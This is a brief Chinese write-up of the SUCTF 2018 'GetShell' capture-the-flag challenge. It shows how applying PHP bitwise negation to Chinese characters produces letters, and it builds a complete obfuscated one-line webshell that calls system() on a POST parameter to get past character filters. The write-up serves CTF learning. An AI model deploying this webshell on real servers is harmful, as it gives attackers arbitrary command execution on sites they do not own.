# [suctf2018]GetShell
参考 p 神利用取反来获取可用字符:
<?php
error_reporting(0);
$a = ~垂;
echo $a."\n";
echo $a[1];
/*
运行得:
a}
a
*/
?>
🐎一下汉字:
echo ~茉**[**$____**]**;//s
echo ~内**[**$____**]**;//y
echo ~茉**[**$____**]**;//s
echo ~苏**[**$____**]**;//t
echo ~的**[**$____**]**;//e
echo ~咩**[**$____**]**;//m
echo ~课**[**$____**]**;//P
echo ~尬**[**$____**]**;//O
echo ~笔**[**$____**]**;//S
echo ~端**[**$____**]**;//T
echo ~瞎**[**$____**]**;//a
构成🐎,POST 参数 a:
<?=$_=[];$__.=$_;$____=$_==$_;$___=~茉[$____];$___.=~内[$____];$___.=~茉[$____];$___.=~苏[$____];$___.=~的[$____];$___.=~咩[$____];$_____=_;$_____.=~课[$____];$_____.=~尬[$____];$_____.=~笔[$____];$_____.=~端[$____];$__________=$$_____;$___($__________[~瞎[$____]]);

# 用 env 访问环境变量获得 flag:
参考自:https://www.shawroot.cc/1856.html